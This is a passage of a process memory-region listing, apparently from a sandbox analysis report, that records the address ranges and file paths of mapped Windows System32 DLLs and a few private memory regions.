start_va = 0x7ffb35190000
end_va = 0x7ffb35198fff
entry_point = 0x7ffb35190000
region_type = mapped_file
name = "httpprxc.dll"
filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll")
Region:
id = 724
start_va = 0x7ffb351a0000
end_va = 0x7ffb351d4fff
entry_point = 0x7ffb351a0000
region_type = mapped_file
name = "fwpolicyiomgr.dll"
filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll")
Region:
id = 725
start_va = 0x7ffb352c0000
end_va = 0x7ffb352f5fff
entry_point = 0x7ffb352c0000
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 726
start_va = 0x7ffb35e60000
end_va = 0x7ffb35e68fff
entry_point = 0x7ffb35e60000
region_type = mapped_file
name = "proximitycommonpal.dll"
filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll")
Region:
id = 727
start_va = 0x7ffb35e70000
end_va = 0x7ffb35e9cfff
entry_point = 0x7ffb35e70000
region_type = mapped_file
name = "proximitycommon.dll"
filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll")
Region:
id = 728
start_va = 0x7ffb35ea0000
end_va = 0x7ffb35eaffff
entry_point = 0x7ffb35ea0000
region_type = mapped_file
name = "proximityservicepal.dll"
filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll")
Region:
id = 729
start_va = 0x7ffb35eb0000
end_va = 0x7ffb35f00fff
entry_point = 0x7ffb35eb0000
region_type = mapped_file
name = "proximityservice.dll"
filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll")
Region:
id = 730
start_va = 0x7ffb35f70000
end_va = 0x7ffb35f7bfff
entry_point = 0x7ffb35f70000
region_type = mapped_file
name = "fvecerts.dll"
filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")
Region:
id = 731
start_va = 0x7ffb35f80000
end_va = 0x7ffb3603dfff
entry_point = 0x7ffb35f80000
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 732
start_va = 0x7ffb36040000
end_va = 0x7ffb360d5fff
entry_point = 0x7ffb36040000
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 733
start_va = 0x7ffb361e0000
end_va = 0x7ffb36247fff
entry_point = 0x7ffb361e0000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 734
start_va = 0x7ffb362a0000
end_va = 0x7ffb362b9fff
entry_point = 0x7ffb362a0000
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 735
start_va = 0x7ffb362c0000
end_va = 0x7ffb362d5fff
entry_point = 0x7ffb362c0000
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 736
start_va = 0x7ffb36330000
end_va = 0x7ffb36460fff
entry_point = 0x7ffb36330000
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 737
start_va = 0x7ffb36470000
end_va = 0x7ffb364adfff
entry_point = 0x7ffb36470000
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Region:
id = 738
start_va = 0x7ffb36530000
end_va = 0x7ffb3654bfff
entry_point = 0x7ffb36530000
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 739
start_va = 0x7ffb366c0000
end_va = 0x7ffb366d7fff
entry_point = 0x7ffb366c0000
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 740
start_va = 0x7ffb366e0000
end_va = 0x7ffb36793fff
entry_point = 0x7ffb366e0000
region_type = mapped_file
name = "usermgr.dll"
filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll")
Region:
id = 741
start_va = 0x7ffb36950000
end_va = 0x7ffb36ad2fff
entry_point = 0x7ffb36950000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 742
start_va = 0x7ffb36bb0000
end_va = 0x7ffb36bdcfff
entry_point = 0x7ffb36bb0000
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 743
start_va = 0x7ffb36be0000
end_va = 0x7ffb36bf6fff
entry_point = 0x7ffb36be0000
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 744
start_va = 0x7ffb36c00000
end_va = 0x7ffb36c15fff
entry_point = 0x7ffb36c00000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 745
start_va = 0x7ffb36c20000
end_va = 0x7ffb36c2ffff
entry_point = 0x7ffb36c20000
region_type = mapped_file
name = "timebrokerclient.dll"
filename = "\\Windows\\System32\\TimeBrokerClient.dll" (normalized: "c:\\windows\\system32\\timebrokerclient.dll")
Region:
id = 746
start_va = 0x7ffb36c30000
end_va = 0x7ffb36c5dfff
entry_point = 0x7ffb36c30000
region_type = mapped_file
name = "wptaskscheduler.dll"
filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll")
Region:
id = 747
start_va = 0x7ffb36c60000
end_va = 0x7ffb36c6ffff
entry_point = 0x7ffb36c60000
region_type = mapped_file
name = "usermgrcli.dll"
filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")
Region:
id = 748
start_va = 0x7ffb36c70000
end_va = 0x7ffb36cddfff
entry_point = 0x7ffb36c70000
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 749
start_va = 0x7ffb36ce0000
end_va = 0x7ffb36cf0fff
entry_point = 0x7ffb36ce0000
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 750
start_va = 0x7ffb36d00000
end_va = 0x7ffb36d79fff
entry_point = 0x7ffb36d00000
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 751
start_va = 0x7ffb36d80000
end_va = 0x7ffb36d8cfff
entry_point = 0x7ffb36d80000
region_type = mapped_file
name = "csystemeventsbrokerclient.dll"
filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll")
Region:
id = 752
start_va = 0x7ffb36d90000
end_va = 0x7ffb36dcffff
entry_point = 0x7ffb36d90000
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 753
start_va = 0x7ffb36dd0000
end_va = 0x7ffb36ecbfff
entry_point = 0x7ffb36dd0000
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 754
start_va = 0x7ffb36ed0000
end_va = 0x7ffb36f11fff
entry_point = 0x7ffb36ed0000
region_type = mapped_file
name = "mstask.dll"
filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll")
Region:
id = 755
start_va = 0x7ffb36f20000
end_va = 0x7ffb36f32fff
entry_point = 0x7ffb36f20000
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 756
start_va = 0x7ffb36f40000
end_va = 0x7ffb36f5dfff
entry_point = 0x7ffb36f40000
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 757
start_va = 0x7ffb36f60000
end_va = 0x7ffb36f86fff
entry_point = 0x7ffb36f60000
region_type = mapped_file
name = "profsvcext.dll"
filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll")
Region:
id = 758
start_va = 0x7ffb36f90000
end_va = 0x7ffb36fe4fff
entry_point = 0x7ffb36f90000
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 759
start_va = 0x7ffb36ff0000
end_va = 0x7ffb370affff
entry_point = 0x7ffb36ff0000
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 760
start_va = 0x7ffb371d0000
end_va = 0x7ffb37234fff
entry_point = 0x7ffb371d0000
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 761
start_va = 0x7ffb373f0000
end_va = 0x7ffb373fafff
entry_point = 0x7ffb373f0000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 762
start_va = 0x7ffb37410000
end_va = 0x7ffb37447fff
entry_point = 0x7ffb37410000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 763
start_va = 0x7ffb37460000
end_va = 0x7ffb37469fff
entry_point = 0x7ffb37460000
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 764
start_va = 0x7ffb37470000
end_va = 0x7ffb37487fff
entry_point = 0x7ffb37470000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 765
start_va = 0x7ffb37490000
end_va = 0x7ffb375dcfff
entry_point = 0x7ffb37490000
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 766
start_va = 0x7ffb37a60000
end_va = 0x7ffb37a72fff
entry_point = 0x7ffb37a60000
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 767
start_va = 0x7ffb38570000
end_va = 0x7ffb385e7fff
entry_point = 0x7ffb38570000
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 768
start_va = 0x7ffb38610000
end_va = 0x7ffb386a5fff
entry_point = 0x7ffb38610000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 769
start_va = 0x7ffb386b0000
end_va = 0x7ffb386d6fff
entry_point = 0x7ffb386b0000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 770
start_va = 0x7ffb38710000
end_va = 0x7ffb3871bfff
entry_point = 0x7ffb38710000
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 771
start_va = 0x7ffb38a70000
end_va = 0x7ffb38aa1fff
entry_point = 0x7ffb38a70000
region_type = mapped_file
name = "fwbase.dll"
filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")
Region:
id = 772
start_va = 0x7ffb38ab0000
end_va = 0x7ffb38b31fff
entry_point = 0x7ffb38ab0000
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 773
start_va = 0x7ffb38c60000
end_va = 0x7ffb38c82fff
entry_point = 0x7ffb38c60000
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 774
start_va = 0x7ffb38d90000
end_va = 0x7ffb38d9bfff
entry_point = 0x7ffb38d90000
region_type = mapped_file
name = "hid.dll"
filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll")
Region:
id = 775
start_va = 0x7ffb38e50000
end_va = 0x7ffb38e97fff
entry_point = 0x7ffb38e50000
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 776
start_va = 0x7ffb38f70000
end_va = 0x7ffb38f8bfff
entry_point = 0x7ffb38f70000
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 777
start_va = 0x7ffb38f90000
end_va = 0x7ffb38f9bfff
entry_point = 0x7ffb38f90000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 778
start_va = 0x7ffb38fa0000
end_va = 0x7ffb38fc5fff
entry_point = 0x7ffb38fa0000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 779
start_va = 0x7ffb39080000
end_va = 0x7ffb390b1fff
entry_point = 0x7ffb39080000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 780
start_va = 0x7ffb390e0000
end_va = 0x7ffb39153fff
entry_point = 0x7ffb390e0000
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 781
start_va = 0x7ffb39160000
end_va = 0x7ffb39169fff
entry_point = 0x7ffb39160000
region_type = mapped_file
name = "dpapi.dll"
filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll")
Region:
id = 782
start_va = 0x7ffb391c0000
end_va = 0x7ffb39217fff
entry_point = 0x7ffb391c0000
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 783
start_va = 0x7ffb39260000
end_va = 0x7ffb39292fff
entry_point = 0x7ffb39260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 784
start_va = 0x7ffb39350000
end_va = 0x7ffb3936efff
entry_point = 0x7ffb39350000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 785
start_va = 0x7ffb39370000
end_va = 0x7ffb393adfff
entry_point = 0x7ffb39370000
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 786
start_va = 0x7ffb393b0000
end_va = 0x7ffb39457fff
entry_point = 0x7ffb393b0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 787
start_va = 0x7ffb395b0000
end_va = 0x7ffb3960cfff
entry_point = 0x7ffb395b0000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 788
start_va = 0x7ffb39610000
end_va = 0x7ffb39626fff
entry_point = 0x7ffb39610000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 789
start_va = 0x7ffb39780000
end_va = 0x7ffb3978afff
entry_point = 0x7ffb39780000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 790
start_va = 0x7ffb397c0000
end_va = 0x7ffb397e0fff
entry_point = 0x7ffb397c0000
region_type = mapped_file
name = "joinutil.dll"
filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll")
Region:
id = 791
start_va = 0x7ffb39810000
end_va = 0x7ffb39845fff
entry_point = 0x7ffb39810000
region_type = mapped_file
name = "ntasn1.dll"
filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")
Region:
id = 792
start_va = 0x7ffb39850000
end_va = 0x7ffb39875fff
entry_point = 0x7ffb39850000
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")
Region:
id = 793
start_va = 0x7ffb39960000
end_va = 0x7ffb3998bfff
entry_point = 0x7ffb39960000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 794
start_va = 0x7ffb39b30000
end_va = 0x7ffb39b49fff
entry_point = 0x7ffb39b30000
region_type = mapped_file
name = "eventaggregation.dll"
filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll")
Region:
id = 795
start_va = 0x7ffb39b50000
end_va = 0x7ffb39b57fff
entry_point = 0x7ffb39b50000
region_type = mapped_file
name = "dabapi.dll"
filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll")
Region:
id = 796
start_va = 0x7ffb39b60000
end_va = 0x7ffb39b87fff
entry_point = 0x7ffb39b60000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 797
start_va = 0x7ffb39b90000
end_va = 0x7ffb39bfafff
entry_point = 0x7ffb39b90000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 798
start_va = 0x7ffb39c00000
end_va = 0x7ffb39c97fff
entry_point = 0x7ffb39c00000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 799
start_va = 0x7ffb39d40000
end_va = 0x7ffb39d50fff
entry_point = 0x7ffb39d40000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 800
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 801
start_va = 0x7ffb39d70000
end_va = 0x7ffb39d82fff
entry_point = 0x7ffb39d70000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 802
start_va = 0x7ffb39d90000
end_va = 0x7ffb39dd9fff
entry_point = 0x7ffb39d90000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 803
start_va = 0x7ffb39de0000
end_va = 0x7ffb3a407fff
entry_point = 0x7ffb39de0000
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 804
start_va = 0x7ffb3a410000
end_va = 0x7ffb3a453fff
entry_point = 0x7ffb3a410000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 805
start_va = 0x7ffb3a460000
end_va = 0x7ffb3a4b3fff
entry_point = 0x7ffb3a460000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 806
start_va = 0x7ffb3a570000
end_va = 0x7ffb3a622fff
entry_point = 0x7ffb3a570000
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 807
start_va = 0x7ffb3a630000
end_va = 0x7ffb3a7f0fff
entry_point = 0x7ffb3a630000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 808
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 809
start_va = 0x7ffb3a9e0000
end_va = 0x7ffb3a9e7fff
entry_point = 0x7ffb3a9e0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 810
start_va = 0x7ffb3a9f0000
end_va = 0x7ffb3aa40fff
entry_point = 0x7ffb3a9f0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 811
start_va = 0x7ffb3aa50000
end_va = 0x7ffb3bf74fff
entry_point = 0x7ffb3aa50000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 812
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 813
start_va = 0x7ffb3c0c0000
end_va = 0x7ffb3c284fff
entry_point = 0x7ffb3c0c0000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 814
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 815
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 816
start_va = 0x7ffb3c570000
end_va = 0x7ffb3c5d8fff
entry_point = 0x7ffb3c570000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 817
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 818
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 819
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 820
start_va = 0x7ffb3ca70000
end_va = 0x7ffb3cb14fff
entry_point = 0x7ffb3ca70000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 821
start_va = 0x7ffb3cb20000
end_va = 0x7ffb3cc60fff
entry_point = 0x7ffb3cb20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 822
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 823
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 824
start_va = 0x7ffb3cfc0000
end_va = 0x7ffb3d01afff
entry_point = 0x7ffb3cfc0000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 825
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 826
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1431
start_va = 0x1c8dde0000
end_va = 0x1c8de5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8dde0000"
filename = ""
Region:
id = 1432
start_va = 0x1c9b600000
end_va = 0x1c9b6fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9b600000"
filename = ""
Region:
id = 1433
start_va = 0x1c9b700000
end_va = 0x1c9b7fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9b700000"
filename = ""
Region:
id = 1434
start_va = 0x1c9b800000
end_va = 0x1c9b8fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9b800000"
filename = ""
Region:
id = 1435
start_va = 0x7ff6c6dd6000
end_va = 0x7ff6c6dd7fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dd6000"
filename = ""
Region:
id = 1436
start_va = 0x7ff6c6dd8000
end_va = 0x7ff6c6dd9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dd8000"
filename = ""
Region:
id = 1437
start_va = 0x7ff6c6dda000
end_va = 0x7ff6c6ddbfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dda000"
filename = ""
Region:
id = 1438
start_va = 0x7ffb235c0000
end_va = 0x7ffb2360cfff
entry_point = 0x7ffb235c0000
region_type = mapped_file
name = "pdh.dll"
filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll")
Region:
id = 1439
start_va = 0x7ffb23610000
end_va = 0x7ffb23731fff
entry_point = 0x7ffb23610000
region_type = mapped_file
name = "dosvc.dll"
filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll")
Region:
id = 1440
start_va = 0x7ffb25340000
end_va = 0x7ffb2534afff
entry_point = 0x7ffb25340000
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 1441
start_va = 0x7ffb318d0000
end_va = 0x7ffb318d9fff
entry_point = 0x7ffb318d0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1498
start_va = 0x1c8de60000
end_va = 0x1c8de60fff
